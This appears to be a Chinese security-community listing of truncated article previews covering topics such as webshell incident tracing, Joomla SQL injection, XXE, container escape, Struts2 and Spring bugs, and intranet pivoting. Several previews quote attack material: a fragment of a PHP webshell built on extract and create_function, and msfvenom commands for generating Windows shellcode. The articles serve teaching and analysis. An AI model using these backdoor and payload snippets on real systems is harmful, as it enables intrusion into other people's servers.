# 【技术分享】浅谈反浏览器指纹追踪 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **作者:[ ComSoc](http://bobao.360.cn/member/contribute?uid=2869876403)** **预估稿费:300RMB** **投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿** 浏览器指纹追踪是在过去五年中出现的一种在网络上追踪用户的方法,为了反制浏览器指纹追踪行为,反浏览器追踪技术也在不断发展。 **一、反浏览器指纹追踪技术概述** 浏览器指纹识别的原理是根据不同浏览平台所使用的硬件类型、操作系统、浏览器类型、浏览器...
社区文章
# 1 背景 一般安全厂商都会有针对web后门的扫描工具,此次拿到了一批网站被植入后门的攻击线索,由于疫情原因,现场排查取证条件比较苛刻,所以此次溯源是在开局一个后门情况下开展,大致思路是连接后门->查看日志->漏洞溯源。 # 2 后门排查 存在后门的URL : <http://www.xxxx.com/plugins/layer/mobile/need/wwConapp.php> <?php function fun2(){ $b=$_POST; return @($b[a]); } @extract(array(b=>create_function(NULL,f...
社区文章
生成环境:kali-linux-2017.3-vm-amd64 生成软件:msfvenom 测试语句: msfvenom -l | grep windows | grep x86 | grep tcp msfvenom -l | grep windows //列出和windows相关的shellcode msfvenom -l encoders //查看所有的可用的编码方式 //msfvenom生成shellcode的方法(for xp&win7&win10成功): msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/al...
社区文章
# 【技术分享】如何从命令行调用Android JNI函数并传递Java对象参数 | ##### 译文声明 本文是翻译文章,文章来源:calebfenton.github.io 原文地址:<https://calebfenton.github.io/2017/04/14/calling_jni_functions_with_java_object_arguments_from_the_command_line/> 译文仅供参考,具体内容表达以及含义原文为准。 **** 翻译:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922) 预估稿费:200RMB 投稿方式...
社区文章
# 针对Win32k类型隔离缓解措施的逆向工程(上) | ##### 译文声明 本文是翻译文章,文章原作者 Francisco Falcon,文章来源:blog.quarkslab.com 原文地址:<https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 目前,越来越多人开始借助GDI Bitmaps对象来实现内核漏洞利用。几乎任何形式的内核损坏漏洞(除NULL写入外),都可以借助于对Bitmaps的滥用,来可靠地获得内核内存的任意R/W原语。基于...
社区文章
**Author: p0wd3r (知道创宇404安全实验室)** **Date: 2017-05-18** ## 0x00 漏洞概述 ### 漏洞简介 Joomla于5月17日发布了新版本3.7.1,(<https://www.joomla.org/announcements/release-news/5705-joomla-3-7-1-release.html>),本次更新中修复一个高危SQL注入漏洞(<https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>),成功利用该漏洞后攻击者可以在未授权的情况下进行SQL注入。 ...
社区文章
本文由红日安全成员: licong 编写,如有不当,还望斧正。 ### 前言 getshell比较麻烦,分享一下过程。希望大家能有所收获。通过SQL注入,我们成功的进入了后台。接下来我们尝试通过后台功能获取webshell。 ### 漏洞分析 在app\common\common\cache.php发现了以下代码: 代码13-14行,设置了文件所在路径,代码20-25行进行对文件内容进行了写入操作,如果变量$cache_data中的内容可控,则可以写入恶意代码,进而getshell。在该文件其余函数中,发现了对该函数的调用,我们来看一下具体代码: 代码68行,将'options'作为参数传入table函数中,返回表前缀+'optio...
社区文章
**前言** 春节期间,又拉了一个没见过的源码看了看,挺小众的,找到了几个简单的提交了CNVD。 **正文** 源码结构如下, 经过我的一番菜鸡分析,application下,admin是admin后台,index是首页的方法,api是用户后台,还有一个wxapi好像是微信小程序的用户后台(因为这个环境我本地没有实现)。 首先是找上传,一般后台的都是这样直奔主题,找到图片管理处 先直接上传个php,发现没有反应,也没报错什么的,感觉没戏,但是文件监控发现点东西 发现上传成功了,于是到源码中删除这个文件,又重新上传了一下,结果 确实返回了json, 离谱啊,找到对应源码处,application/a...
社区文章
**作者: CDK-Team 项目地址:<https://github.com/cdk-team/CDK/>** CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。 ## 场景介绍 伴随着容器技术的快速发展,容器安全问题也逐渐成为企业所关注的话题。针对容器场景的渗透测试一方面要求攻击者理解对Docker/K8s以及云服务的原理、特性以及漏洞利用方式;另一方面,攻击者通过业务漏洞(如WEB RCE)攻入容器后往往面对的是一个缩减后的容器环境,缺乏常用的linux命令依赖导致渗透效率不佳。 CDK为安全测试...
社区文章
# 记一次曲折的渗透测试 | ##### 译文声明 本文是翻译文章,文章来源:蓝冰@360安全播报 译文仅供参考,具体内容表达以及含义原文为准。 **BY:蓝冰** **稿费:1000** 目标: [http://www.xxx.xx.xx](http://www.xxx.xx.xx/) 首先手工挖掘漏洞和信息. 找到后台地址 然而访问不了目测被限制IP,返回403测试发现不光访问不了后台,所有URL路径,GET,POST,COOKIE中带admin都会返回403.坑啊~~先放一边继续挖掘 接着很快找到一枚注入 [http://www.xxx.xx.xx/news/xxx.html?xxxxx=1869+and+1=1](http:...
社区文章
# 从XXE盲注到获取root级别文件读取权限 ##### 译文声明 本文是翻译文章,文章原作者 honoki,文章来源:honoki.net 原文地址:<https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 概述 在最近的一次赏金活动中,我发现了一个XML终端,它对XXE漏洞利用尝试给出了有趣的响应。针对这一点,我没有找到太多的文档记录,只发现了在2016年由一位开发人员做出的记录。 在本文中,我将梳理我的思考过程,并逐步解决遇到的各种问题,最终我将一个中危漏洞成功提升为高危...
社区文章
# xxl-job api未授权Hessian2反序列化 ## 前言 ​ 最新版有师傅已经给出POC,配置执行器,新建任务对关联服务器执行`shell`命令,但是比较蛋疼的是可能关联服务在内网,无法直接从公网攻击. ​ 链接:<https://github.com/jas502n/xxl-job> **本文主要针对xxl-job低版本api接口存在Hessian2反序列化,可以直接攻击调度中心.** ## 测试环境 xxl-job 2.0.2 Jdk: 8u191 Linux ## JobApiController#api 在version`<`2.0.2版本中,`JobApiController#api`中调用`invokeAdm...
社区文章
来源:http://netsecurity.51cto.com/art/201701/526861.htm **引言** 目前值得高兴的是,开发者在建立网站时,已经开始关注安全问题了——几乎每个开发者都知道SQL注入漏洞了。在本文中,我将为读者介绍另一种与SQL数据库相关的漏洞,虽然它的危害性与SQL注入不相上下,但目前却很少为人所知。接下来,我将为读者详细展示这种攻击手法,以及相应的防御策略。 **背景知识** 最近,我遇到了一段有趣的代码,它尝试尽一切可能来保护数据库的访问安全,例如每当新用户进行注册时,将运行以下代码: <?php // Checking whether a user with the sam...
社区文章
## 记一次从linux打进域控 ### 前言: 这个周的话比较忙,就简单复盘一次之前从linux打进域控所涉及的内容,整体来说比较容易理解,从信息收集到权限维持都有所涉及。 ### getshell: 通过s2漏洞拿下一个口子,这里怎么看是s2搭建的网站,一个是直接看网站后缀是否是action,另一个是可以对登陆处进行抓包,查看数据包后缀是否包含.action. 这里的话就直接s2一把梭哈。 成功拿到权限,这里还是一样上传木马来进行权限维持,至于怎么上传前面文章有讲到过。 这里成功上传木马。 ### 信息收集: 我们对该linux进行简单的信息收集,通过翻看历史记录,数据库文件等获得了几条有效密码: kartxx/karx...
社区文章
# 360安全报告:巴西网络生活与安全研究 | ##### 译文声明 本文是翻译文章 原文地址:[http://zt.360.cn/1101061855.php?dtid=1101062370&did=3701377956](http://zt.360.cn/1101061855.php?dtid=1101062370&did=3701377956) 译文仅供参考,具体内容表达以及含义原文为准。 关键词 巴西、里约、奥运会、网银、诈骗、绑架、慈善 摘要 巴西的互联网发展 巴西人的上网偏好 巴西流行的木马和钓鱼 巴西流行的网络诈骗陷阱 里约出行安全提示 里约的出租车司机宰客的现象比较严重,使用打车软件叫车会更加安全可靠。 里约的正规商...
社区文章
当今web程序的开发技术真是百家争鸣,ASP.NET, PHP, JSP,Perl, AJAX 等等。 无论Web技术在未来如何发展,理解Web程序之间通信的基本协议相当重要, 因为它让我们理解了Web应用程序的内部工作. 本文将对HTTP协议进行详细的实例讲解,内容较多,希望大家耐心看。也希望对大家的开发工作或者测试工作有所帮助。使用Fiddler工具非常方便地捕获HTTP Request和HTTP Response, 关于Fiddler工具的用法,请看博客[[Fiddler 教程](http://www.cnblogs.com/TankXiao/archive/2012/02/06/2337728.html)] # 什么是HTT...
社区文章
# CVE-2018-15982漏洞详细分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 好久没分析漏洞了,趁着最近Flash 0day的热度再来玩一波。 ## 0x1 提取内嵌swf 拿到的样本是个docx文档,解压后发现内嵌有一个activeX控件,根据控件的classid能够判断出是一个Flash动画相关: 分析activeX1.bin文件,在其偏移0xa08位置发现了flash动画文件的标志头: 直接将该位置到文件尾部的数据截取下来,然后用010edit的swf文件模版修正一下格式去掉多余数据后可以提取出被插入的原swf文件: ## 0x2 样本攻击流程分析 攻击样本是个docx文档...
社区文章
# 安全事件周报(11.23-11.29) ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x01 事件导览 本周收录安全事件 `51` 项,话题集中在 `勒索软件` 、 `网络攻击` 方面,涉及的组织有:`GitHub` 、 `Advantech` 、 `Minecraft` 、 `Banijay` 等。勒索泛滥,员工安全意识提升也是企业安全重要一环对此,360CERT建议使用 `360安全卫士` 进行病毒检测、使用 `360安全分析响应平台` 进行威胁流量检测,使用 `360城市级网络安全监测服务QUAKE` 进行资产测绘,做好资产自查以及预防工作,以免遭受黑客攻击。 恶意程序 | 等...
社区文章
# 智能红绿灯自动控制系统分析 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 交通信号灯是指挥交通运行的信号灯,也称红绿灯,由红灯、绿灯、黄灯组成。红灯表示禁止通行,绿灯表示准许通行,黄灯表示警示。三种颜色的指示灯亮的时间并不是随意设置的,合理的设置各个指示灯的时间,可以有效地疏导交通流量、提高道路通行能力,减少交通事故。本文主要通过使用博途软件、西门子S7-300编辑红绿灯的控制逻辑程序来讲解指示灯控制流程工作,以便在后续的研究过程中更熟悉设备运行。 图1 ## 一、红绿灯 早期的红绿灯主要是一个被动机械控制工具,在红绿灯加入电气控制后,控制系统通过提前设置好的方案和时间发出指...
社区文章
> 前言 > > ​ 利用内存马达到命令执行/文件下载等操作已经是老生常谈的,在现在的红蓝对抗中,很多时候拿到权限,但却在内网无法伸展,这种情况已经越来越常见了。 ​ 近月,内存马的技术也产生新的变化,如利用websocket进行通信,Executor内存马进行socket通信。可以看到内存马开始寻找新的载体。本文介绍利用Poller(Executor的上层类)内存马实现全流量监控,这样,攻击方可以实时监控经过系统的每一个请求,或者增加了钓鱼等信息利用的便利。先贴出项目<https://github.com/Kyo-w/trojan-eye> ## 原理 这里借用深蓝师傅的图片,Poller作为TCP连接最前置的处理类,此类能够直接...
社区文章
# 高中生,一年,从 0 到 0day 的秘密 ##### 译文声明 本文是翻译文章,文章原作者 ccc,文章来源:media.ccc.de 原文地址:<https://media.ccc.de/v/35c3-9657-from_zero_to_zero_day> 译文仅供参考,具体内容表达以及含义原文为准。 编译:360代码卫士团队 在第35届混沌通信大会上 (35C3),今年上大一的 Jonathan Jacobi 发表了题为《从0到 0day》讲述了自己如何从安全基础几乎为零的情况下,用了一年多点的时间在 Edge 浏览器中找到了自己的首个 0day 漏洞。他希望对有志于从事安全事业的新手带来一些帮助,同时希望对学习更多关于浏...
社区文章
# 溯源黑帽利用 Web 编辑器漏洞非法植入 SEO 页面事件 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 **作者:SanLorewalker@知道创宇404积极防御实验室** ## 一、背景 知道创宇威胁情报中心-业务安全舆情监测平台不断发现大量网站被植入非法SEO内容页面,且最近有明显上升的现象,2020年4月至6月发现了6,802个网站被植入了4,955,586个非法SEO内容页面,知道创宇404积极防御实验室的安全研究员针对该现象了进行了分析、溯源。 被非法植入SEO页面的域名备案省份分布如下: 图 1 非法植入SEO页面省份分布图 其中,企业占了67%;政府机关、事业单位等国家机构...
社区文章
老大让我搞一个目标oa.xxx.com(非破坏,好像是说要取证。。。反正不是做破坏就对了) 目标是oa.xxx.com。(简单介绍下oa,用的是正方软件,百度了很多相关漏洞之类的,我也看了 大部分说的漏洞都是这里的一些,比如注入上传一类的,还有一个是说xsxjxtdl.aspx这个文件的注入。可惜我这里这个目标都没有。(webservice里面的BMCheckPassword和checkaccount之类的我都测试过了,注入不存在) 所以就内网入手了。 拿shell的过程很简单,弱口令猜后台,改配置文件上传文件类型,cer类型没过滤,轻松get到一个低权限的webshell。 接着,就是收集信息咯.比如ip,用户,系统版本,密码还有...
社区文章
作者:猎户安全实验室 公众号:<https://mp.weixin.qq.com/s/SJPXdZWNKypvWmL-roIE0Q> #### 0x00 漏洞概览 漏洞名称:Spring Integration Zip不安全解压 漏洞编号:CVE-2018-1261 漏洞级别:严重(官方定级,比高危还高) 漏洞危害:在spring-integration-zip.v1.0.1.RELEASE之前的版本中,恶意用户通过在压缩文件中构造包含有特定文件名称的文件(受影响文件格式有bzip2, tar, xz, war, cpio, 7z),应用程序使用spring-integration-zip进行解压时,会导致跨目录任意写入文件漏洞...
社区文章
## 文章前言 在一次做项目的时候本来是想去点击Burpsuite的Proxy界面的HTTP History选项卡来查看HTTP历史请求记录信息并做测试的,但是在查看的时候却下意识的点击到了HTTP Proxy右侧的"WebSockets History"选项卡中,从界面的交互历史中发现网站有使用WebSocket进行通信,虽然之前有对Websocket有一些简单的了解(比如:跨越问题),但是未对此进行深入研究,这让我产生了需要深入研究一下的想法 ## 历史背景 在过去的很长一段时间,创建客户端和服务器之间双向通信的WEB应用程序(例如:即时消息和游戏应用程序)大多都是通过HTTP协议来轮询服务器以获取更新,同时将上游通知作为不同的...
社区文章
作者:LoRexxar'@知道创宇404实验室 # 0x01 前言 WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。Alexa排行前100万的网站中有超过16.7%的网站使用WordPress。到了2011年8月,约22%的新网站采用了WordPress。WordPress是目前因特网上最流行的博客系统。 在zoomeye上可以搜索到的wordpress站点超过500万,毫不夸张的说,每时每刻都有数不清楚的人试图从wordpress上挖掘漏洞... 由于前一段时间一直在对wordpress做代码审计,所以今天就对wordpress做一个比较完整的架构安全...
社区文章
#### 有限制的代码执行漏洞 这个漏洞呢在很久以前乌云上就被人提起,但是貌似一直没有修复。 平时有空刷一刷乌云上的代码审计文章能学到不少东西的,一些姿势可能是一点就明白,但是如果没有了解过,自己可能需要很长时间去发现,当你看到一些有趣的姿势,再想想自己在审的有没有可能存在同样的情况。 首先找到的入口点在common.func.php第554-559行 function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); retu...
社区文章
# 如何基于Python写一个TCP反向连接后门 ##### 译文声明 本文是翻译文章,文章原作者 sergeantsploit,文章来源:0x00sec.org 原文地址:<https://0x00sec.org/t/how-to-make-a-reverse-tcp-backdoor-in-pytho> 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x0 介绍 在Linux系统做未授权测试,我们须准备一个安全的渗透环境,通常第一件事就是安装虚拟机。且在攻击阶段中还需要对受害系统进行控制。常见的后门大多数是利用Metasploit生成,而目前反病毒产品遇到Metasploit文件签名的程序就会添加特征库作为查杀对象,所以...
社区文章
**申明:本文仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关** **0x00 前言** 总结与分享才是学习中的最大受益者,因为我们要将一些东西讲明白,就得构思,而在成文的过程中我们又不免要去查阅一些资料,去研究相关技术的原理和细节,在这过程中自己多少都会获益。所以,每次在实战中学到的新东西,我都会写成文章来总结和分享,以期不断进步,也作为平时的学习笔记,以便遗忘时得以查阅。这次分享的是某项目中遇到的非域环境下的大型内网横向实战。 **注:** 为确保客户隐私不泄漏,以下截图均来自本地靶场环境,截图内容不重要,主要是思路和技巧。 **0x01 外网打...
社区文章
# Java安全之Weblogic 2016-3510 分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 续前面两篇文章的T3漏洞分析文章,继续来分析CVE-2016-3510漏洞,该漏洞一样是基于,前面的补丁进行一个绕过。 ## 0x01 工具分析 这里还需要拿出上次的weblogic_cmd的工具来看一下CVE-2016-3510的命令执行payload怎么去进行构造。 来到源码中的Main这个入口点这里,前面的TYPE需要修改为`marshall`,因为这次是需要使用到`MarshalledObject`来进行封装对象。 填入参数,打个断点测试一下。 前面的都分析...
社区文章
**作者:天融信阿尔法实验室 公众号:[Java框架级SSM代码审计思路](https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&mid=2247487592&idx=1&sn=b17808935868f9af51de882caf4d8df0&chksm=ce955d56f9e2d440d03a6901cd8a015b1434bd68a4d87e9ea27f9c84c922816ddad5626cb3ad&mpshare=1&scene=1&srcid=1113bdNAI13VhYCweeaRrnhm&sharer_sharetime=1573637041587&sharer_sha...
社区文章
# 【漏洞分析】Struts2 S2-046 漏洞原理分析 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **** **传送门** [**【重大漏洞预警】Struts 2 远程代码执行漏洞(S2-045S2-046) (含PoC)** ****](http://bobao.360.cn/learning/detail/3571.html) [**【漏洞分析】Strust2 S2-046 远程代码执行漏洞两个触发点分析**](http://bobao.360.cn/learning/detail/3639.html) ** ** **作者:hezi@360GearTeam...
社区文章
# WAF Bypass之webshell上传jsp与tomcat ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 1.开个头 事情是这样的,某一天,笔者闲着无聊,对着Tomcat的示例文件到处点点,希望寻找出点什么,意外发现Tomcat的示例文件中一些有趣的示例: 随后笔者翻开Tomcat的解析代码,对其进行了一番静态代码审阅,果然有蹊跷,后面又调试看了看。 ## 2 代码要点简析 对于脚本jsp文件,会通过EncodingDetector进行字符集类型的探测,该处代码要点较多,也是主逻辑,所以整片代码放上来了。 apache-tomcat-9.0.35/lib/jasper.jar!/...
社区文章
# 走进森林深处(三) ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 如果看过我的读者应该清楚,我写文章都是按照系列去写的。我希望这种系列类的文章能带给读者学习的连贯性,倘若看了我的文章继续学习还要再去翻阅其他作者的文章这便是一种得不偿失。这种阅读缺乏连贯性,也让读者在多个作者的写作思路上多处徘徊……这是域系列的第四篇文章,我想我把更新频率放的这么快也希望读者能有一个良好的体验,不至于在学习的道路上还去等待此为其一,其二是希望读者不必在阅读下一篇文章时还要去反过头来去看看上篇文章是否记得。在上篇提到,内网的本质是信息收集。但是我不想把域内信息收集的命令多数抛出让读者不知道这些命令所...
社区文章
# 0x01 漏洞简述 * `漏洞名称`:evilReflex漏洞(call注入攻击) * `漏洞危害`:攻击者可以通过该漏洞将存在存在evilReflex漏洞的合约中的任意数量的token转移到任意地址 * `影响范围`:多个ERC233标准智能合约 # 0x02 预备知识 智能合约的外部调用方式-`call` //使用方式 <address>.call(bytes) //Call消息传递 <address>.call(函数选择器, arg1, arg2, …) * `Call消息传递` `call()`是一个底层的接口,用来向一个合约发送消息,也就是说如果你想实现自己的消息传递,可以使用这...
社区文章
## 背景 这篇文章是关于在Apple的XNU操作系统内核中发现的堆缓冲区溢出漏洞。大佬编写了一个exp验证漏洞,它可以在同一网络上重启任何Mac或iOS设备,无需任何用户交互。Apple已将此漏洞归类为内核中的远程执行代码漏洞,因为可能利用缓冲区溢出来执行内核中的任意代码。 以下操作系统版本和设备易受攻击: * Apple iOS 11及更早版本:所有设备(升级到iOS 12) * Apple macOS High Sierra,最高可达10.13.6:所有设备(在安全更新2018-001中打补丁) * Apple macOS Sierra,包括10.12.6:所有设备(在安全更新2018-005中打补丁) * A...
社区文章
最近在代码审计一个区块链的源代码的时候发现的。 审查发现用的是base58的编码。 没看清楚,直接用base64去解,后来才发现不是base64,大写的一个囧 后来查了查资料 Base58是用于Bitcoin中使用的一种独特的编码方式,主要用于产生Bitcoin的钱包地址。 相比Base64,Base58不使用数字"0",字母大写"O",字母大写"I",和字母小写"l",以及"+"和"/"符号。 设计Base58主要的目的是: * 避免混淆。在某些字体下,数字0和字母大写O,以及字母大写I和字母小写l会非常相似。 * 不使用"+"和"/"的原因是非字母或数字的字符串作为帐号较难被接受。 * 没有标点符号,通常不会被从中间...
社区文章
# 作者简介 练良伟,中通信息安全团队软件开发工程师,负责中通内部安全通讯产品的开发工作,专注于服务端开发相关的技术研究。 # 1.项目背景 中通快递目前拥有几万个快递网点、代理点和承包区,这些网点分布在全球各地。每天网点与网点、网点与集团总部之间都需要传输大量的信息,信息类型包括文本、图片、文件、语音等。在研发内部安全通讯软件之前,主要使用QQ、微信、钉钉等公众即时通讯类软件传输信息,导致公司的私密信息直接暴露在公共网络以及私人设备上,无法进行有效管控,存在严重的信息泄露安全风险。因此我们迫切需要一款有安全保障的即时通讯软件作为公司内部的信息交流通道。 # 2.需要解决的问题 在开始软件产品设计之前,我们要先调研用户的实际需求,并...
社区文章
# 使用Rust构建一个快速的Electron APP | ##### 译文声明 本文是翻译文章,文章原作者 Kevin J. Lynagh,文章来源:keminglabs.com 原文地址:<https://keminglabs.com/blog/building-a-fast-electron-app-with-rust/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 当我研发Finda时,我非常希望它能够做到快速,最好能在16毫秒内相应所有用户输入。 经过认真研究,我们惊讶地发现Finda是用Electron构建的,该框架经常被批评速度缓慢。 在本文中,我将重点说明如何在充分利用Electron易于打包、...
社区文章
# CVE-2018-1270:spring-messaging远程代码执行漏洞分析预警 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 报告编号: B6-2018-040901 报告来源: 360-CERT 报告作者: 360-CERT 更新日期: 2018-04-09 ## 漏洞概述 2018年4月5日,Pivotal Spring官方发布安全公告,Spring框架中存在三个漏洞,其中编号为CVE-2018-1270的漏洞可导致远程代码执行。 360-CERT通过对此漏洞进行了相关分析,认为漏洞影响严重;目前相关PoC已经被发布,建议相关用户尽快进行评估升级。 ## 漏洞影响面 #### 影响...
社区文章
来自i春秋作者:[Szdny](http://bbs.ichunqiu.com/thread-11581-1-1.html?from=paper) #### 00x01 ver.txt版本为 20160816 由于X_Al3r提交过补天,所以最新版本已经不能复现,所以我特地问了他要了前一个版本过来写这篇文章 这里便是Csrf触发点,我们创建文件的时候抓取他的POST包 POST /uploads/dede/file_manage_control.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 151 Cache-Control: max-age=0 A...
社区文章
# DEFCON CTF QUALS 2019 之Hotel_California ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 `Defcon ctf 2019`中大部分时间都在和队友一起看hotel_california这道题,看到最后也只是知道应该利用TSX,想办法让程序能进入到预先加载的指令——也就是我们写入的shellcode,从而实现执行shellcode获得shell的目的,但是一直到最后也没有运行shellcode成功,直到看了Github上`x64x6a`给出的[exp](https://github.com/x64x6a/ctf-writeups/tree/ma...
社区文章
# 全球首次!中国黑客公布“催眠”特斯拉技术细节 | ##### 译文声明 本文是翻译文章,文章来源:雷锋网&史中 原文地址:<http://www.leiphone.com/news/201608/yty43tdMp3K2gclo.html> 译文仅供参考,具体内容表达以及含义原文为准。 “催眠”特斯拉,这样疯狂的事情,也许只有在世界顶级黑客会议 DEF CON 上才能看到。而且,没错,又是中国黑客干的。 先来说说特斯拉辅助驾驶(AutoPilot)。这个让埃隆·马斯克引以为傲的系统,已经在全世界的特斯拉汽车上大规模应用。这个系统可以实现自动跟车,自动转向,甚至在堵车的时候,也可以自动跟着前车反复启停。 讲真,辅助驾驶系统的可用性...
社区文章